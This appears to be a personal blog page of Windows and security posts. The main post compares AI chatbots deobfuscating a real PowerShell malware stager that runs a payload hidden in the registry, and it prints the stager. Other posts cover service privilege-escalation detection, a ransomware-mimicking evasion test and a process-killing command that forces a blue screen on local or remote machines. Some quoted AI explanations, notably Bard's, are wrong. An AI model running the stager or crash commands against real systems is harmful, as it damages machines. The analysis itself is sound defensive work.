Malware Analysis: GPT3.5 vs 4 vs Bing Chat vs Bard

I’ll just ignore the fact that this is my first post since 1683 days, because I can.

Today we are going to have a look at how ChatGPT revolutionized the way we perform static malware analysis, precisely obfuscated code analysis, AND I will be comparing the output of the top 4 currently available AI tools: ChatGPT-3.5, ChatGPT-4, Bing Chat GPT-4 and Google Bard.

In the last couple of days one of my sandbox machines got infected with a new PowerShell based CryptoStealer (Yay me 🎉 little do they know that I’m currently crypto-broke), which runs in 3 phases: A stager, which runs another stage-like code which communicates with a C2 server over DNS to run the actual malware in memory.

We will use the first PowerShell stager as an example for today, which is an obfuscated PS one-liner command that executes another script hidden in the registry. File contents below:

$JEzTkjdyrhDpDt=[ScriptBlock]; icm ($JEzTkjdyrhDpDt::Create([string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ }))))

Depending on your PowerShell skills, it might take you anywhere from a couple of minutes to half an hour to manually de-obfuscate this code, but this ain’t 2010’s anymore, we have AI on our side now, so let’s use our new slaves to reduce this time to mere seconds.

I used the following prompt, followed by the stager code:

Rewrite the following obfuscated PowerShell script in a way that is easy to understand then explain what does it do, and, in summary, its main goal:

PS: I didn’t run any follow-up prompts to attempt to get better results, the displayed output is based solely on the initial prompt

Let’s check the results of each of the 4 tools:

ChatGPT-3.5

The PowerShell script you provided executes a single line of code that is heavily obfuscated, making it difficult to understand what it does.
Here is a simplified version of the script that is easier to read and understand:

$code = [string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ }))
$block = [ScriptBlock]::Create($code)
Invoke-Command $block

This code creates a ScriptBlock object from an obfuscated string of code, then executes it using the Invoke-Command cmdlet. The main goal of this script is to execute the code contained in the obfuscated string. However, without knowing what the obfuscated code does, it's difficult to determine the purpose of the script as a whole.

Comments on ChatGPT-3.5

You call that de-obfuscated code??? My 4-year-old daughter can do better, thanks for nothing.

The goal description is also pretty useless, shame…

ChatGPT-4

The obfuscated PowerShell script can be rewritten in a more understandable way as follows:

$ScriptBlock = [ScriptBlock]
$ReversedString = 'kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH'
$Matches = [regex]::Matches($ReversedString, '.', 'RightToLeft') | ForEach {$_.value}
$JoinedMatches = -join $Matches
$Property = (gp $JoinedMatches).'Ge1WvZfVx'
$DecodedChars = $Property | % { [char]$_ }
$DecodedString = -join $DecodedChars
Invoke-Command -ScriptBlock $ScriptBlock::Create($DecodedString)

The script does the following:

1. Creates an empty ScriptBlock called $ScriptBlock.
2. Uses regex to reverse the string 'kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH', which results in 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'.
3. Creates a new script block using the newly obtained string as a path and appending 'Ge1WvZfVx' to the end of the path, creating 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ge1WvZfVx'.
4. Invokes the newly created script block using Invoke-Command.

In summary, the main goal of the script is to execute a hidden PowerShell script stored in the registry under the path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ge1WvZfVx'. The obfuscation is likely done to avoid detection by antivirus or other security measures, which is a common technique used in malicious scripts.

Comments on ChatGPT-4

While the reversed registry key path is not 100% accurate, it re-wrote the code in separate steps and made it much easier to understand, then explained it !

It also provided a very useful goal description, clear and easy to understand, also very accurate, it even used the word “hidden”, how cool is that !!

Bing Chat GPT-4

The PowerShell script you provided is obfuscated. Obfuscation is the practice of making code difficult to understand or read. It is often used to protect intellectual property or to hide malicious code.

The script appears to be using the Invoke-Command cmdlet (icm) to execute a script block (`$JEzTkjdyrhDpDt::Create([string]::Join(‘’, ((gp (([regex]::Matches(‘kvbdBSZePlyrkirP nitraM\ERAWTFOS:MLKH’,‘.’,‘RightToLeft’) | ForEach {$.value}) -join ‘’)).‘Ge1WvZfVx’ | % { [char]$ })))).

The script block is stored in the variable $JEzTkjdyrhDpDt. The script block appears to be created by calling the Create method on the $JEzTkjdyrhDpDt object. The Create method appears to be taking a string as input. The string is created by joining together the results of several commands.

Unfortunately, without more context it is difficult to determine what the script block does or what its main goal is. If you can provide more information about where this script came from or what it is supposed to do, I may be able to help you better.

Comments on Bing Chat

It didn’t even bother to try to write a de-obfuscated version of the code, we got a nimrod over here…

Also it tried to explain the obvious on the code level (poorly), not even close to goal-wise nor on a high level.

Google Bard

Sure, I can help you with that. Here is the rewritten PowerShell script:

$JEzTkjdyrhDpDt = [ScriptBlock]::Create('
$args = @()
foreach ($arg in $args) {
iex $arg
}
')

icm $JEzTkjdyrhDpDt::Create([string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ }))))

This script is a simple malware that runs a command on the system. It first creates a new script block, which is a type of PowerShell object that can be used to execute code. The script block contains a simple loop that executes the commands that are passed to it. The script then uses the Get-Process cmdlet to get a list of all the processes that are running on the system. It then uses the Regex cmdlet to find all of the processes that match a certain pattern. The pattern that it is looking for is kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH. This pattern is actually a string that has been reversed. When the string is reversed, it becomes HELLO WORLD. The script then uses the ForEach-Object cmdlet to iterate over the list of processes that match the pattern. For each process, it uses the iex cmdlet to execute the command that is associated with the process.

The main goal of this script is to run a command on the system. The command that it runs is determined by the string that is passed to it. The string that is passed to it is actually a reversed string that contains the command that the script should run.

Comments on Bard

Bard did try to de-obfuscate the code, but tried very poorly, useless.

But it DID identifies it as Malware, so Kudos for that, also it knew the main goal (executing a command on the system), although it got chocked-up on technicalities.

Verdict

This is an easy one: Chapeau bas to the OG, ChatGPT-4 is just on another level!
Of course the others COULD perform better with follow-up prompts, but ChatGPT-4 did not require any 🤩

What do you think? Have you tried any more powerful tools for this type of analysis?

Evading Palo Alto Traps Anti-Ransomware Protection (OBSOLETE)

This piece could be the shortest article you have/will read today, so don’t blink:

The PoC script below will mimic a ransomware, it will wipe the whole D: drive except some pre-excluded files and folders ($TrustedFiles and $TrustedFolders).
When running this script, Traps (version 4.1.0 and above, with the Anti-Ransomware module activated) will flag it as a ransomware and kills the process, that is because it is performing bulk files/folders modification:

The (Awesome) Universal Uninstall Script

So, it is the final quarter of the year, internal audit has just woken up from their hibernation directly up your…sleeves, and wants to keep stuff compliant.

Your manager, for the little sadist that he is, sends you a list of some twenty+ applications to uninstall from all the end-user machines.

As you already experienced the pain of uninstalling different applications from different vendors before, you know that not every company builds a way to perform silent/command line uninstallation.

So you tell your manager: Not this time you neo-fascist! (In your mind, of course, you don’t want to end up on the streets working for Facebook, because #DeleteFacebook right? Too much? ok…)

Today we will use a commercial uninstall tool coupled with our custom script to uninstall virtually any software, remotely and silently.

First, you need to buy Revo Uninstaller Pro Portable, it costs around 30$ per year, cheaper than a mid-fancy dinner.
Then, you create a deployment package, save my following script in the same directory as RevoUnPro.exe and publish it to all your users:

Windows Privilege Escalation: Automatically Detecting Vulnerable Services

Hello People,

I know I know, it’s been a while, but who’s counting!

So, a very quick overview of Windows privilege escalation using misconfigured services: If a service’s executable DACLs allows any normal user (non-admin) to delete it, that means that any user can replace that executable with another one of his choosing, thus running any software as Admin! (Please ignore the plethora of “Any”…)

Below is a mini/mildly-dirty script that I wrote to check all local services for any vulnerable services:

$vulnList=$NULL
foreach ($proc in (Get-WmiObject win32_service | select  @{Name="Path"; Expression={$_.PathName.split('"')[1]}})){
	if (($proc.Path).length -ne 0){
		[string]$resp = icacls $proc.Path
	}

	if ($resp.contains("Everyone:(F)") -or $resp.contains("Everyone:(I)(F)")){
		$vulnList = $vulnList+ $proc.Path
	}
}
$vulnList

This script will enumerate all the local services paths and check the DACLs of each one, searching for the following ACE: Everyone (F), which means “Everyone” has full control over this file.

While testing on a dummy machine, I found a sneaky service that comes by default with this specific computer model:

Random Flying Bits #1

If Python is executable pseudocode, then perl is executable line noise.

DNS Self-Service with Orchestrator

Monday morning, you’re sitting in the comfort of your cubical, playing Minecraft, building a giant pixelated reptile, determined and focused, when suddenly a new outlook toast with “New DNS record creation request” as the subject appears… You feel like:

You know the feeling, that woman is my role model !

Imagine if you could just reply the man with “Use the DNS self-service form, fiend” and continue with your masterpiece.

Fret not, old friend, that is exactly what we are going to do today !

DSC vs Group Policy: In Plain English!

Internet, we meet again!

No, it didn’t take me 14 months to write this article, i just had a bad case of fleas that took a while to shake off (metaphorically, of course).

As you already know, Windows server 2012R2 is already being shipped with the new PowerShell feature/framework: Desired State Configuration. In this article i will list a summary of key differences between group policy and DSC, in ENGLISH.
Microsoft provided us several tools to manage Windows, other than GP and DSC (e.g. SCCM DCM, InTune), but I wanted to compare those two specifically because they are free, mainly.
Enough chit-chat, differences, in no particular order:

DSC, by using MOF files (which are not proprietary to Windows), can manage Linux boxes, while group policy (currently) can’t.
DSC can use any MOF file created by any future 3rd party product that can potentially leverage DSC as a policy engine.
DSC is easy to extend (the only limit is PowerShell’s potency), whereas extending Group Policy can be really daunting.
DSC writes all errors in the Windows event logs when things go south, while not all Group Policy settings does that.
DSC periodic configuration refresh checks for updates every 15 mins by default, whereas Group Policy’s background refresh can take up to 120 mins.
DSC stores the required config and resources locally, so even if there is no network connection, configuration refresh WILL occur, whereas group policy requires connections to AD and SYSVOL to perform its background refresh.
DSC config/policy can be applied to workgroup machines, thus your DMZ machines will never be out of shape again, whereas group policy requires the machine to be in an AD domain.
DSC, while declarative, does not have any GUI (yet), while group policies GUI is easy to use and well known.
DSC is more complex to apply, whereas Group Policy is click-driven.
DSC provides centralized triggering of configuration distribution, while Group Policy relies on the GP client to trigger refreshes.
Group Policy uses a combination of event-driven (like computer startup and user logon) mechanisms, while DSC does not have anything like it yet.
DSC tattooes its changes on the machine, that means when a DSC config item is no longer applied, its changes does not revert back to its original state, whereas “most” Group Policy settings are not tattooed (GPP is another story).
DSC scripts is more human-readable than a raw Group Policy file.
In my opinion, DSC is more likely to be used on Servers, while Group Policy is still for both servers and clients (excluding perimeter machines).

That’s it, short and simple, I hope you’ve found it useful. Let me know what do you think by leaving a comment below.
Until next year (hopefully not), have a great one!

Poor man’s enterprise remote support solution

There are tons of remote support tools for AD environments, but most of them are commercial, and some of them are user initiated (like Lync 2010+ desktop sharing feature), today we will implement an agentless (sort of), free and pretty effective solution, the end result is a box that you enter the destined Username in (the person you’re trying to help), et voila, you have control over his screen ! (gentlemen, after his permission, of course)

Chapter I :

The base application that we will use is “Windows Remote Assistance” which ships for free with most Windows 7 flavors, the rest is scripting gimmicks.

Out of the box, Windows remote assistance will work if the requester sent an invitation file to the helper, but in our case, we want to initiate the process by offering our help before we even hear the nagging.

To do so, we need to create and link a GPO to our computers OU that enables just that :

Computer Configuration > Policies > Administrative Templates > System > Remote Assistance

Enable the “Offer Remote Assistance” option and select who can offer remote support, typically you will add your Help Desk group

After you gpupdate the end-user’s machine, try it:

Open “Windows Remote Assistance” from your helper workstation, then click on Continue reading

Producing an Intentional BSOD (Blue Screen of Death)

In some cases you may feel an urge to experience a lucid nightmare intentionally: to Generate a Blue Screen of Death !

Why ? You may have some sort of cluster configuration or some kind of HA solution that you want to dirty-test

This can be done using several ways, one including editing the registry and using the NumLock key, but the one we’ll check today is much simpler

First you need to have PowerShell installed (you can produce the same outcome by using any tool that can interface with WMI, PowerShell is the easiest)

Then open a elevated PowerShell console and type :

Get-Process | Stop-Process

A nice BSOD will appear

If you want to produce a BSOD on a remote machine, you need to have PowerShell remoting enabled and some firewall exceptions added to the target. To do so, open an elevated command prompt console (on the remote machine) and run:

winrm quickconfig

Then from your machine, issue the following:

Enter-PSSession ComputerName
Get-Process|Stop-Process

That’s my time for today, see you in a few days (or weeks…or months)

RDP 7 vs RDP 8: Wan Optimization, Zombies Style

Yes, 5 months have passed since my last post, I was busy,with uhmm, stuff…

Now enough with my hypocrisy, today my curious monkey refused to sleep before i test the new “Wan Optimization” that Microsoft allegedly added to its new RDP v8.0 feature set that ships natively with Windows 2012.

So i setup 2 client machines, one with RDP v7.1 client and another with RDP v8.0, i will be connecting to my remote machine from home via an RD gateway server which is located in our remote branch’s DMZ.

Now we have to find some material worth testing on, and what is more frustrating than playing flash games over RDP? Their rich graphics, high frame rates and fade in-out effects (alpha) makes it the best candidate.

I decided to go with something zombies related, “Earn to die 2012” is a great game (Disclaimer above): www.flashgames247.com/play/15994.html

*Round 1: RDP client v7.1 connecting to RDP v7.1 (or v8.0)

Of course RDP v8.0 is backward compatible so if you connect from a v7.1 client it will work but you will not get v8’s features
General Experience: Very slow and choppy gameplay, hangs when fading effects come into play, quality is good
Judgment: Unplayable

Skripting

Scripting, Systems and Security crap